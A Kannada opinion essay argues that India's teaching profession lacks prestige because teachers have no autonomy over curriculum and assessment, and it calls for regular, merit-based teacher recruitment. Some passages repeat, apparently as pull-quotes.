ಸ್ವಾಯತ್ತ ಮತ್ತು ಸ್ವತಂತ್ರ ಶಿಕ್ಷಕರು ಬೇಕು

 ಶಿಕ್ಷಕರನ್ನು ಗುರುತಿಸದ ದೇಶಕ್ಕೆ ತಿಳಿವಳಿಕೆ ನೀಡುವುದು ಹೇಗೆ..?

ನಾವು ಇಲ್ಲಿ ಕೇಳಿಕೊಳ್ಳುತ್ತಿರುವ ಪ್ರಶ್ನೆಯು ನನಗೆ ಯಕ್ಷಪ್ರಶ್ನೆಯೆಂದೇನು ಅನಿಸುತ್ತಿಲ್ಲ. ಬದಲಾಗಿ, ಮೂರು ದಶಕಗಳಿಂದ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರವನ್ನು ಹತ್ತಿರದಿಂದ ಅಭ್ಯಸಿಸುತ್ತಿರುವ ನನ್ನ ಅನುಭವದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಈ ಪ್ರಶ್ನೆಗೆ ನೇರವಾದ ಮತ್ತು ಸರಳವಾದ ಉತ್ತರವೊಂದನ್ನು ನೀಡಬಯಸುತ್ತೇನೆ.

ಭಾರತದಲ್ಲಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯು ಪ್ರತಿಭಾವಂತರಿಗೆ ಯಾಕೆ ಮೊದಲನೆಯ ಆಯ್ಕೆಯಾಗುತ್ತಿಲ್ಲ ಎನ್ನುವ ಪ್ರಶ್ನೆಯನ್ನು ಗಣ್ಯರಿಂದ ಸಾಮಾನ್ಯರವರೆಗೆ ಎಲ್ಲರೂ ಕೇಳುವುದನ್ನು ನಾವೆಲ್ಲರೂ ಗಮನಿಸಿದ್ದೇವೆ. ಎರಡು ವರ್ಷಗಳ ಹಿಂದೆ ಅಂದಿನ ಮಾನವ ಸಂಪನ್ಮೂಲ ಅಭಿವೃದ್ಧಿ ಸಚಿವರಾದ ಪ್ರಕಾಶ್ ಜಾವಡೇಕರ್ ಅವರು ನಾನು ಭಾಗವಹಿಸಿದ್ದ ಟೆಲಿವಿಷನ್ ಚರ್ಚೆಯೊಂದರಲ್ಲಿ ಈ ಪ್ರಶ್ನೆಯನ್ನು ಗಂಭೀರವಾಗಿ ಎತ್ತುತ್ತ, ತಮಗೆ ಇದಕ್ಕೆ ಉತ್ತರ ದೊರಕುತ್ತಿಲ್ಲ ಎಂದರು. ಶಾಲೆ-ಕಾಲೇಜುಗಳ ವಿದ್ಯಾರ್ಥಿಗಳೊಡನೆಯ ಸಮಾಲೋಚನಾ ಸಭೆಗಳಲ್ಲಿ ತಾನು ಇಂದಿನ ಯುವಜನರ ವೃತ್ತಿ ಆಯ್ಕೆ ಏನಿರುತ್ತದೆ ಎನ್ನುವುದನ್ನು ಕೇಳುವುದಾಗಿ ಅವರು ಹೇಳಿದರು. ಇದಕ್ಕೆ ಉತ್ತರವಾಗಿ ವಿಜ್ಞಾನ-ತಂತ್ರಜ್ಞಾನ, ವೈದ್ಯಕೀಯ, ಉದ್ದಿಮೆ ಮತ್ತು ಸರ್ಕಾರಿ ಸೇವೆಗಳತ್ತಲೆ ತಮ್ಮ ಒಲವನ್ನು ವ್ಯಕ್ತ ಪಡಿಸುತ್ತಾರೆ, ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಆಯ್ಕೆ ಮಾಡುವುದಾಗಿ ಬೆರಳಣಿಕೆಯಷ್ಟು ವಿದ್ಯಾರ್ಥಿಗಳೂ ಹೇಳುವುದಿಲ್ಲ ಎಂದು ವಿಷಾದದ ದನಿಯಲ್ಲಿ ಮಾತನಾಡಿದರು.

ಜಾವಡೇಕರ್ ಅವರ ಅನುಭವ ನಮ್ಮೆಲ್ಲರ ಅನುಭವವೂ ಹೌದು. ವಿದ್ಯಾರ್ಥಿಗಳು ಮಾತ್ರವಲ್ಲ, ಪೋಷಕರೂ ಸಹ ತಮ್ಮ ಮಕ್ಕಳು ಇತರೆ ಆಯ್ಕೆಗಳಿದ್ದ ಸಂದರ್ಭದಲ್ಲಿ ಶಿಕ್ಷಕರಾಗಲಿ ಎಂದು ಬಯಸುವುದಿಲ್ಲ. ಇತ್ತೀಚೆಗಿನ ದಶಕಗಳಲ್ಲಿ ಎಲ್ಲ ಹಂತಗಳಲ್ಲಿ ಶಿಕ್ಷಕರ ಸಂಬಳಗಳು ಸ್ಪರ್ಧಾತ್ಮಕವಾಗಿಯೆ ಇವೆ. ಇತರೆ ಸರ್ಕಾರಿ ಮತ್ತು ಖಾಸಗಿ ವಲಯಗಳ ವೃತ್ತಿಗಳಿಗೆ ಹೋಲಿಸಿದರೆ, ಶಿಕ್ಷಕರ ಸೇವಾ ನಿಯಮ ಮತ್ತು ನಿರೀಕ್ಷೆಗಳು ಹಾಗೂ ವೃತ್ತಿ ಭದ್ರತೆಯೂ ಸಹ ಸಾಕಷ್ಟು ಆಕರ್ಷಕವಾಗಿಯೆ ಇವೆ. ಇಷ್ಟಾದರೂ ಪ್ರತಿಭಾವಂತ ಯುವಕ-ಯುವತಿಯರು ಶಿಕ್ಷಕರಾಗಲು ಏಕೆ ಬಯಸುತ್ತಿಲ್ಲ.

ನಮ್ಮ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಶಿಕ್ಷಕ ಗುಮಾಸ್ತ ಮಾತ್ರ. ತನ್ನ ತರಬೇತಿ, ತಿಳಿವಳಿಕೆ, ಜ್ಞಾನ ಮತ್ತು ಬೌದ್ಧಿಕತೆಗಳನ್ನು ಬಳಸಲು ಶಿಕ್ಷಕನಿಗೆ ಅವಕಾಶಗಳಿಲ್ಲ. ತನ್ನ ಮುಂದಿರುವ ವಿದ್ಯಾರ್ಥಿಗಳ ಕಲಿಕೆಯ ಮಟ್ಟವೇನು, ಅವರ ಅಗತ್ಯಗಳೇನು ಮತ್ತು ಅವುಗಳನ್ನು ಸ್ವಾಯತ್ತವಾಗಿ ಪೂರೈಸುವುದು ಹೇಗೆ ಎನ್ನುವುದನ್ನು ತೀರ್ಮಾನಿಸುವ ಯಾವ ಸಾಧ್ಯತೆಗಳೂ ಅವನಿಗಿಲ್ಲ.

ಪಶ್ಚಿಮದ ದೇಶಗಳಲ್ಲಿ ಹಾರ್ವರ್ಡ್, ಸ್ಟಾನಫರ್ಡ್  ಮೊದಲಾದ ಪ್ರತಿಷ್ಠಿತ ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳ ಪದವೀಧರರು ಪ್ರೌಢಶಾಲಾ ಶಿಕ್ಷಕರಾಗಿ ಕೆಲಸ ಮಾಡುವುದನ್ನು ಸಾಮಾನ್ಯವಾಗಿ ನೋಡುತ್ತೇವೆ. ಭಾರತದಲ್ಲಿ ಐಐಟಿಗಳು ಇಲ್ಲವೆ ಕೇಂದ್ರೀಯ ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳ ವಿದ್ಯಾರ್ಥಿಗಳಿರಲಿ, ಸಾಮಾನ್ಯ ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳ ಪದವೀಧರರು ಸಹ ಇತರೆ ವೃತ್ತಿಗಳನ್ನು ತಮ್ಮ ಮೊದಲ ಆಯ್ಕೆಯಾಗಿ ಇರಿಸಿಕೊಳ್ಳುತ್ತಾರೆ ಎನ್ನುವುದು ಎಲ್ಲರಿಗೂ ತಿಳಿದಿದೆ.

ನಾವು ಇಲ್ಲಿ ಕೇಳಿಕೊಳ್ಳುತ್ತಿರುವ ಪ್ರಶ್ನೆಯು ನನಗೆ ಯಕ್ಷಪ್ರಶ್ನೆಯೆಂದೇನು ಅನಿಸುತ್ತಿಲ್ಲ. ಬದಲಾಗಿ, ಮೂರು ದಶಕಗಳಿಂದ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರವನ್ನು ಹತ್ತಿರದಿಂದ ಅಭ್ಯಸಿಸುತ್ತಿರುವ ನನ್ನ ಅನುಭವದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಈ ಪ್ರಶ್ನೆಗೆ ನೇರವಾದ ಮತ್ತು ಸರಳವಾದ ಉತ್ತರವೊಂದನ್ನು ನೀಡಬಯಸುತ್ತೇನೆ.

ಭಾರತದಲ್ಲಿ ಇಂದು ಶಿಕ್ಷಕನಿಗೆ ಯಾವ ಹಂತದಲ್ಲಿಯೂ -ಅಂದರೆ ಅಂಗನವಾಡಿಯಿಂದ ವಿಶ್ವವಿದ್ಯಾನಿಲಯದವರೆಗೆ- ಸ್ವಾಯತ್ತವಾಗಿ ಕೆಲಸ ಮಾಡುವ ಅವಕಾಶವಿಲ್ಲ. ನನ್ನ ಮಾತಿನ ಅರ್ಥವಿಷ್ಟೆ. ನಮ್ಮ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಶಿಕ್ಷಕ ಗುಮಾಸ್ತ ಮಾತ್ರ. ತನ್ನ ತರಬೇತಿ, ತಿಳಿವಳಿಕೆ, ಜ್ಞಾನ ಮತ್ತು ಬೌದ್ಧಿಕತೆಗಳನ್ನು ಬಳಸಲು ಶಿಕ್ಷಕನಿಗೆ ಅವಕಾಶಗಳಿಲ್ಲ. ತನ್ನ ಮುಂದಿರುವ ವಿದ್ಯಾರ್ಥಿಗಳ ಕಲಿಕೆಯ ಮಟ್ಟವೇನು, ಅವರ ಅಗತ್ಯಗಳೇನು ಮತ್ತು ಅವುಗಳನ್ನು ಸ್ವಾಯತ್ತವಾಗಿ ಪೂರೈಸುವುದು ಹೇಗೆ ಎನ್ನುವುದನ್ನು ತೀರ್ಮಾನಿಸುವ ಯಾವ ಸಾಧ್ಯತೆಗಳೂ ಅವನಿಗಿಲ್ಲ. ಇದಕ್ಕಾಗಿಯೆ ಶಿಕ್ಷಕನನ್ನು ವೈಭವೀಕೃತ ಗುಮಾಸ್ತನೆಂದಲ್ಲದೆ ಬೇರೆ ರೀತಿಯಲ್ಲಿ ಬಣ್ಣಿಸಲು ಸಾಧ್ಯವಾಗುತ್ತಿಲ್ಲ.

ಪಠ್ಯಪುಸ್ತಕ ರಚನಾ ಸಮಿತಿಗಳು ಮತ್ತು ಅಧ್ಯಯನ ಹಾಗೂ ಪರೀಕ್ಷಾ ಮಂಡಳಿಗಳು ನಮ್ಮ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಪ್ರಾಮುಖ್ಯವನ್ನು ಪಡೆದಿವೆ. ಇದರ ಪರಿಣಾಮವೆಂದರೆ ತಮ್ಮ ಮುಂದಿರುವ ಮಕ್ಕಳ ಅವಶ್ಯಕತೆಗಳ ಮೌಲ್ಯಮಾಪನ ಮಾಡಿ, ಅವರಿಗೆ ಶಿಕ್ಷಣ ನೀಡುವ ಸಾಮಥ್ರ್ಯ ಇಂದಿನ ಶಿಕ್ಷಕರಿಗಿಲ್ಲ.

ಪಠ್ಯಕ್ರಮ, ಪಠ್ಯಪುಸ್ತಕ ಮತ್ತು ಪಾಠಯೋಜನೆಗಳನ್ನು ಮತ್ತಾರೊ, ಇನ್ನೆಲ್ಲಿಯೊ ಕುಳಿತಿರುವ ಪರಿಣತರು ಮಾಡುತ್ತಾರೆ. ಶಿಕ್ಷಕರಿಗೆ ಸಿಗುವ ತರಬೇತಿಯೂ ಸಹ ಬೇರೆ ಯಾರೊ ಸಿದ್ಧಪಡಿಸಿರುವ ಪಠ್ಯಕ್ರಮಗಳನ್ನು ಅನುಷ್ಠಾನಗೊಳಿಸುವುದಷ್ಟೆ. ಅದಕ್ಕಾಗಿಯೆ ಪಠ್ಯಪುಸ್ತಕ ರಚನಾ ಸಮಿತಿಗಳು ಮತ್ತು ಅಧ್ಯಯನ ಹಾಗೂ ಪರೀಕ್ಷಾ ಮಂಡಳಿಗಳು ನಮ್ಮ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಪ್ರಾಮುಖ್ಯವನ್ನು ಪಡೆದಿವೆ. ಇದರ ಪರಿಣಾಮವೆಂದರೆ ತಮ್ಮ ಮುಂದಿರುವ ಮಕ್ಕಳ ಅವಶ್ಯಕತೆಗಳ ಮೌಲ್ಯಮಾಪನ ಮಾಡಿ, ಅವರಿಗೆ ಶಿಕ್ಷಣ ನೀಡುವ ಸಾಮಥ್ರ್ಯ ಇಂದಿನ ಶಿಕ್ಷಕರಿಗಿಲ್ಲ.

ಶಿಕ್ಷಕನನ್ನು ಗುರುವೆಂದು, ಭಾರತದ ನಾಗರಿಕತೆಯಲ್ಲಿ ಗುರುವಿಗೆ ಅತ್ಯುನ್ನತ ಸ್ಥಾನವಿದೆ ಎನ್ನುವ ಮಾತುಗಳು ಆಗಾಗ ಕೇಳಿಬರುತ್ತವೆ. ಆದರೆ ಇವು ಅರ್ಥಹೀನ ಮಾತುಗಳು ಎನ್ನದೆ ವಿಧಿಯಿಲ್ಲ. ಗುರುಕುಲ ಪದ್ಧತಿಯ ಬಗ್ಗೆ ಮಾತನಾಡುವ ಬಲಪಂಥೀಯ ಸಂಸ್ಥೆಗಳು ಮತ್ತು ಚಿಂತಕರು ಶಿಕ್ಷಕರನ್ನು ಕೇಂದ್ರದಲ್ಲಿರಿಸಿರುವ ಶಾಲೆ-ಕಾಲೇಜು-ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳನ್ನು ಕಟ್ಟಿಲ್ಲ. ಇದು ದಯಾನಂದ ಸರಸ್ವತಿಯವರಿಂದ ಬಾಬಾ ರಾಮದೇವ್ ತನಕದ ಎಲ್ಲ ಮಠಗಳು, ಸಮಾಜಸುಧಾರಣಾ ಸಂಸ್ಥೆಗಳ ನಿದರ್ಶನದಲ್ಲಿಯೂ ನಿಜವಾಗುವ ಮಾತು. ಇವರಾರೂ ಸಹ ತಮ್ಮ ಶೈಕ್ಷಣಿಕ ಸಂಸ್ಥೆಗಳನ್ನು ತನ್ನ ತರಗತಿಯನ್ನು ಸ್ವತಂತ್ರವಾಗಿ ನಡೆಸಬಲ್ಲ ಶಕ್ತಿಯಿರುವ ಶಿಕ್ಷಕನ ಸುತ್ತ ನಿರ್ಮಿಸಿಲ್ಲ. ನಮ್ಮ ಶೈಕ್ಷಣಿಕ ತರಬೇತಿಯಲ್ಲಿ ಸಹ ಇಂತಹ ಸಾಮಥ್ರ್ಯವನ್ನು ಮುಖ್ಯವೆಂದು ಇದುವರೆಗೆ ಗುರುತಿಸಿಲ್ಲ. ಗುರು ಎನ್ನುವುದು ಹೆಸರಿಗೆ ಮಾತ್ರ ಇರುವ ಮೌಲ್ಯ ಮತ್ತು ಆದರ್ಶವಾಗಿದೆಯೆ ಹೊರತು, ವಾಸ್ತವದಲ್ಲಿ ಗುರುವಿಗೆ ಯಾವುದೆ ಬೆಲೆಯಿಲ್ಲ.

ಸ್ವಾತಂತ್ರ್ಯ ಮತ್ತು ಸ್ವಾಯತ್ತತೆಗಳನ್ನು ಎತ್ತಿಹಿಡಿಯುತ್ತದೆ ಮತ್ತು ವ್ಯಾಪಕವಾಗಿ ಅಳವಡಿಸಿಕೊಂಡಿದೆ. ಉದಾಹರಣೆಗೆ, ಪಶ್ಚಿಮದ ರಾಷ್ಟ್ರಗಳಲ್ಲಿ ಇಂದಿಗೂ ಸ್ಥಳೀಯ ಮಟ್ಟದಲ್ಲಿಯೆ ಶಾಲಾ ಪಠ್ಯಕ್ರಮ ಮತ್ತು ಪಾಠಯೋಜನೆಯನ್ನು ಮಾಡುವ ವ್ಯವಸ್ಥೆಯಿದೆ. ಪ್ರೌಢಶಾಲೆಗಳ ಅಧ್ಯಾಪಕರು ತಮ್ಮ ತರಗತಿಗಳಲ್ಲಿ ವಿದ್ಯಾರ್ಥಿಗಳು ಯಾವ ಸಾಹಿತ್ಯ ಕೃತಿಗಳನ್ನು ಓದಬೇಕು ಮತ್ತು ಅವರನ್ನು ಹೇಗೆ ಪರೀಕ್ಷಿಸಬೇಕು ಎನ್ನುವುದನ್ನು ತೀರ್ಮಾನಿಸುತ್ತಾರೆ.

ಇದರ ಪರಿಣಾಮವಾಗಿಯೆ ಇಪ್ಪತ್ತನೆಯ ಶತಮಾನದ ಆರಂಭದಲ್ಲಿ ನಮ್ಮ ಹಳ್ಳಿಗಳಲ್ಲಿನ ಕೂಲಿ ಮಠದ ಮೇಷ್ಟ್ರುಗಳಿಗಿದ್ದ ಸಾಮಥ್ರ್ಯ ಮತ್ತು ಸ್ವಾತಂತ್ರ್ಯಗಳು ಇಂದಿನ ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳ ಹಿರಿಯ ಪ್ರಾಧ್ಯಾಪಕರಿಗೆ ಇಲ್ಲ. ನನ್ನ ಮಾತಿನ ಅರ್ಥವಿಷ್ಟೆ. ಕೂಲಿ ಮಠದ ಮೇಷ್ಟ್ರಿಗೆ ತನ್ನ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಏನು ಕಲಿಸಬೇಕು ಎನ್ನುವುದನ್ನು ತೀರ್ಮಾನಿಸುವ ತಿಳಿವಳಿಕೆ, ಸಾಮಥ್ರ್ಯ ಮತ್ತು ಅವಕಾಶಗಳೆಲ್ಲವೂ ಇದ್ದವು. ಈಗಿನ ವಿಶ್ವವಿದ್ಯಾನಿಲಯದ ಹಿರಿಯ ಪ್ರಾಧ್ಯಾಪಕರಿಗೂ ಸಹ ಈ ಮೂರೂ ಗುಣಗಳಿಲ್ಲ.

ವಿಪರ್ಯಾಸವೆಂದರೆ ಆಧುನಿಕ ಪಶ್ಚಿಮದ ಶೈಕ್ಷಣಿಕ ವ್ಯವಸ್ಥೆಯು ಇಂತಹ ಸ್ವಾತಂತ್ರ್ಯ ಮತ್ತು ಸ್ವಾಯತ್ತತೆಗಳನ್ನು ಎತ್ತಿಹಿಡಿಯುತ್ತದೆ ಮತ್ತು ವ್ಯಾಪಕವಾಗಿ ಅಳವಡಿಸಿಕೊಂಡಿದೆ. ಉದಾಹರಣೆಗೆ, ಪಶ್ಚಿಮದ ರಾಷ್ಟ್ರಗಳಲ್ಲಿ ಇಂದಿಗೂ ಸ್ಥಳೀಯ ಮಟ್ಟದಲ್ಲಿಯೆ ಶಾಲಾ ಪಠ್ಯಕ್ರಮ ಮತ್ತು ಪಾಠಯೋಜನೆಯನ್ನು ಮಾಡುವ ವ್ಯವಸ್ಥೆಯಿದೆ. ಪ್ರೌಢಶಾಲೆಗಳ ಅಧ್ಯಾಪಕರು ತಮ್ಮ ತರಗತಿಗಳಲ್ಲಿ ವಿದ್ಯಾರ್ಥಿಗಳು ಯಾವ ಸಾಹಿತ್ಯ ಕೃತಿಗಳನ್ನು ಓದಬೇಕು ಮತ್ತು ಅವರನ್ನು ಹೇಗೆ ಪರೀಕ್ಷಿಸಬೇಕು ಎನ್ನುವುದನ್ನು ತೀರ್ಮಾನಿಸುತ್ತಾರೆ.

ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳಲ್ಲಿಯಂತೂ ಅಧ್ಯಾಪಕರೆ ತಮ್ಮ ತರಗತಿಗಳ ಪಠ್ಯಕ್ರಮ ಮತ್ತು ಪರೀಕ್ಷಾ ವ್ಯವಸ್ಥೆಗಳನ್ನು ನಿರ್ಧರಿಸುತ್ತಾರೆ. ಇವರ ಬಗ್ಗೆ ಏಕೆ ಪಕ್ಷಪಾತ ಮತ್ತು ವೃತ್ತಿಪರತೆಯ ದೂರುಗಳು ಕೇಳಿಬರುವುದಿಲ್ಲ?

ಬದಲಿಗೆ ಸ್ವ-ಗೌರವ ಮತ್ತು ಸ್ಥಾನಮಾನಗಳ ಪ್ರಶ್ನೆ. ತನ್ನ ಮುಂದಿರುವ ವಿದ್ಯಾರ್ಥಿ ಏನನ್ನು, ಹೇಗೆ ಕಲಿಯಬೇಕು ಎನ್ನುವುದನ್ನು ಅರಿಯಲಾರದ ಗುರುವನ್ನು ಇಟ್ಟುಕೊಂಡು ನಾವು ಮಾಡುವುದಾದರೂ ಏನು? ಅಂತಹ ಶಿಕ್ಷಕನಿಗೆ ಯಾವ ಮರ್ಯಾದೆ ದೊರಕುತ್ತದೆ ಅಥವಾ ಕೊಡಬೇಕು?

ಗುರುಕುಲ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಗುರುವಿಗೆ ಇದ್ದ ಸ್ವಾಯತ್ತತೆ ಮತ್ತು ಪ್ರಾಮುಖ್ಯ ಇಂತಹದೆ ಅಲ್ಲವೆ. ಪಶ್ಚಿಮದ ಈ ಬಗೆಯ ಉತ್ತಮ ಮತ್ತು ಅನುಕರಣೀಯ ಲಕ್ಷಣಗಳನ್ನು ಭಾರತೀಯ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಆಧುನಿಕ ಪಶ್ಚಿಮದ ಪ್ರಭಾವದ ಬಗ್ಗೆ ಕಟುವಾಗಿ ಮಾತನಾಡುವವರು ಸಂಪೂರ್ಣವಾಗಿ ನಿರ್ಲಕ್ಷಿಸುತ್ತಾರೆ. ನಿಜವಾದ ಅರ್ಥದ ಗುರುಕುಲದ ಲಕ್ಷಣಗಳು ಇಂದು ಪಶ್ಚಿಮದ ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳಲ್ಲಿ ಕಾಣಬರುತ್ತವೆ ಎನ್ನುವುದನ್ನು ಗಮನಿಸುವುದೆ ಇಲ್ಲ.

ಇದಕ್ಕಾಗಿಯೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಆಕರ್ಷಣೆಯನ್ನು ಹೆಚ್ಚಿಸಬೇಕೆಂದರೆ ಶಿಕ್ಷಕನಿಗೆ ಅಗತ್ಯವಿರುವ ಸ್ವಾಯತ್ತತೆ ಮತ್ತು ಸ್ವಾತಂತ್ರ್ಯಗಳನ್ನು ವಾಪಸು ಕೊಡಬೇಕಾಗಿದೆ. ಇದು ಸಂಬಳ ಮತ್ತು ಇತರೆ ಸೌಲಭ್ಯಗಳ ಪ್ರಶ್ನೆಯಲ್ಲ. ಬದಲಿಗೆ ಸ್ವ-ಗೌರವ ಮತ್ತು ಸ್ಥಾನಮಾನಗಳ ಪ್ರಶ್ನೆ. ತನ್ನ ಮುಂದಿರುವ ವಿದ್ಯಾರ್ಥಿ ಏನನ್ನು, ಹೇಗೆ ಕಲಿಯಬೇಕು ಎನ್ನುವುದನ್ನು ಅರಿಯಲಾರದ ಗುರುವನ್ನು ಇಟ್ಟುಕೊಂಡು ನಾವು ಮಾಡುವುದಾದರೂ ಏನು? ಅಂತಹ ಶಿಕ್ಷಕನಿಗೆ ಯಾವ ಮರ್ಯಾದೆ ದೊರಕುತ್ತದೆ ಅಥವಾ ಕೊಡಬೇಕು?

ಸಚಿವರ ಚಿತ್ತ ಇಂತಹ ಮೂಲಮಟ್ಟದ ಶಸ್ತ್ರಚಿಕಿತ್ಸೆಯತ್ತ ಹರಿಯಲಿಲ್ಲ. ಬದಲಿಗೆ ಅಂತಹ ಕ್ರಮವೊಂದನ್ನು ಕೈಗೊಳ್ಳಲು ಇರುವ ಪ್ರಾಯೋಗಿಕ ಸಮಸ್ಯೆಗಳ ಸುತ್ತ ಅವರ ಉತ್ತರವು ಗಿರಕಿ ಹೊಡೆಯಿತು.

ನಾನು ಇಲ್ಲಿ ಗುರುತಿಸುತ್ತಿರುವ ಸಮಸ್ಯೆ ಮೂಲಭೂತವಾದುದು ಮತ್ತು ಇದಕ್ಕೆ ಸರಳವಾದ ಪರಿಹಾರಗಳಿಲ್ಲ ಎನ್ನುವುದನ್ನು ಮತ್ತೆ ಹೇಳಬೇಕಿಲ್ಲ. ನಾನು ಮೇಲೆ ಪ್ರಸ್ತಾಪಿಸಿದ ಟೆಲಿವಿಷನ್ ಚರ್ಚೆಯಲ್ಲಿ ಸಚಿವ ಜಾವಡೇಕರ್ ಅವರಿಗೆ ನಾನು ಈ ಮುಂದಿನ ಪ್ರಶ್ನೆಯನ್ನು ಕೇಳಿದೆ: ಭಾರತದ ಪ್ರಾಚೀನ ಗುರುಕುಲ ವ್ಯವಸ್ಥೆಯ ಬಗ್ಗೆ ವೈಭವೀಕರಿಸಿ ಮಾತನಾಡುವುದು ಸುಲಭ. ಆದರೆ ಶಿಕ್ಷಕನಿಗೆ ದೊರಕಬೇಕಿರುವ ಸ್ವಾಯತ್ತತೆ ಮತ್ತು ಸ್ವಾತಂತ್ರ್ಯಗಳನ್ನು ಹೇಗೆ ನೀಡುತ್ತೀರಿ?

ಸಚಿವರ ಚಿತ್ತ ಇಂತಹ ಮೂಲಮಟ್ಟದ ಶಸ್ತ್ರಚಿಕಿತ್ಸೆಯತ್ತ ಹರಿಯಲಿಲ್ಲ. ಬದಲಿಗೆ ಅಂತಹ ಕ್ರಮವೊಂದನ್ನು ಕೈಗೊಳ್ಳಲು ಇರುವ ಪ್ರಾಯೋಗಿಕ ಸಮಸ್ಯೆಗಳ ಸುತ್ತ ಅವರ ಉತ್ತರವು ಗಿರಕಿ ಹೊಡೆಯಿತು. ಇದು ಜಾವಡೆಕರ್ ಒಬ್ಬರ ಸಮಸ್ಯೆಯಲ್ಲ, ಎಲ್ಲ ಪಕ್ಷಗಳ ಸರ್ಕಾರಗಳ ಶಿಕ್ಷಣ ಸಚಿವರಿಗೂ ಅನ್ವಯಿಸುವ ವಿಮರ್ಶೆ.

ನನ್ನ ದೃಷ್ಟಿಯಲ್ಲಿ, ಭಾರತೀಯ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯನ್ನು ಸುಧಾರಣೆ ಮಾಡಬೇಕೆಂದರೆ ಎರಡು ಕೆಲಸಗಳನ್ನು ತುರ್ತಾಗಿ, ಅಗತ್ಯವಾಗಿ ಮಾಡಬೇಕು. ಗಮನಿಸಿ: ಈ ಎರಡೂ ಸುಧಾರಣೆಗಳು ಶಿಕ್ಷಕ ಕೇಂದ್ರಿತವಾದವುಗಳು.

ಈಗಿರುವಂತೆ ಹಲವಾರು ವರ್ಷಗಳ ಕಾಲ ನೇಮಕಾತಿಗಳೆ ಆಗುವುದಿಲ್ಲ. ಹಾಗಾಗಿ, ಶಿಕ್ಷಕನಾಗಲು ಬಯಸುವ ಪದವೀಧರನು ದಶಕಗಳ ಕಾಲ ಖಾಯಂ ಕೆಲಸವೊಂದನ್ನು ಪಡೆಯಲು ಕಾಯಬೇಕಾಗುತ್ತಿದೆ.

ಮೊದಲಿಗೆ, ಎಲ್ಲ ಹಂತಗಳಲ್ಲಿಯೂ ಶಿಕ್ಷಕರ ಹುದ್ದೆಗಳನ್ನು ನಿಯಮಿತವಾಗಿ, ಪ್ರತಿವರ್ಷವೂ ತುಂಬುತ್ತ ಬರಬೇಕಿದೆ. ಈಗಿರುವಂತೆ ಹಲವಾರು ವರ್ಷಗಳ ಕಾಲ ನೇಮಕಾತಿಗಳೆ ಆಗುವುದಿಲ್ಲ. ಹಾಗಾಗಿ, ಶಿಕ್ಷಕನಾಗಲು ಬಯಸುವ ಪದವೀಧರನು ದಶಕಗಳ ಕಾಲ ಖಾಯಂ ಕೆಲಸವೊಂದನ್ನು ಪಡೆಯಲು ಕಾಯಬೇಕಾಗುತ್ತಿದೆ. ಆದರೆ ತಾಂತ್ರಿಕ, ವೈದ್ಯಕೀಯ ಮತ್ತು ನಿರ್ವಹಣಾ ಶಾಸ್ತ್ರಗಳ ಪದವೀಧರರು ಅವರ ಪರೀಕ್ಷೆ ಮುಗಿಯುವ ಮೊದಲೆ ಕೆಲಸ ಪಡೆದಿರುತ್ತಾರೆ. ಅಧ್ಯಾಪನ ವೃತ್ತಿಯ ಘನತೆ ಮತ್ತು ಆಕರ್ಷಣೆ ಕಡಿಮೆಯಾಗಿರಲು ಇದೂ ಒಂದು ಕಾರಣ.

ಆದರೆ ಕೇವಲ ನಿಯಮಿತವಾದ ನೇಮಕಾತಿಯೊಂದೆ ಸಾಲದು. ಅದಕ್ಕಾಗಿಯೆ ನನ್ನ ಎರಡನೆಯ ಸಲಹೆಯಿದು. ನಾನು ಮೇಲೆ ವಾದಿಸಿರುವಂತೆ ಶಿಕ್ಷಕನ ಸ್ವಾಯತ್ತತೆ ಮತ್ತು ಸ್ವಾತಂತ್ರ್ಯವನ್ನು ವಾಪಸಾಗಿಸುವ ವ್ಯವಸ್ಥೆಯಾಗಬೇಕು. ಇಂತಹ ಸ್ವಾಯತ್ತತೆ ಮತ್ತು ಸ್ವಾತಂತ್ರ್ಯಗಳಿಗೆ ಯೋಗ್ಯರಾದವರಿಗೆ ಮಾತ್ರ ಕೆಲಸ ದೊರಕಬೇಕು. ಈ ಅಂಶವನ್ನು ಎಷ್ಟು ಒತ್ತಿ ಹೇಳಿದರೂ ಸಾಲದು. ರಾಜಕಾರಣಿಗಳು, ಮಠಾಧಿಪತಿಗಳು ಮತ್ತು ಪ್ರಭಾವಿ ವ್ಯಕ್ತಿಗಳ  ಶಿಫಾರಸ್ಸಿನ ಆಧಾರದ ಮೇಲೆ ನೇಮಕಾತಿಗಳಾಗುವುದಾದರೆ ನಮ್ಮ ಈ ಎಲ್ಲ ಚರ್ಚೆಗಳು ಅರ್ಥಹೀನವಷ್ಟೆ.

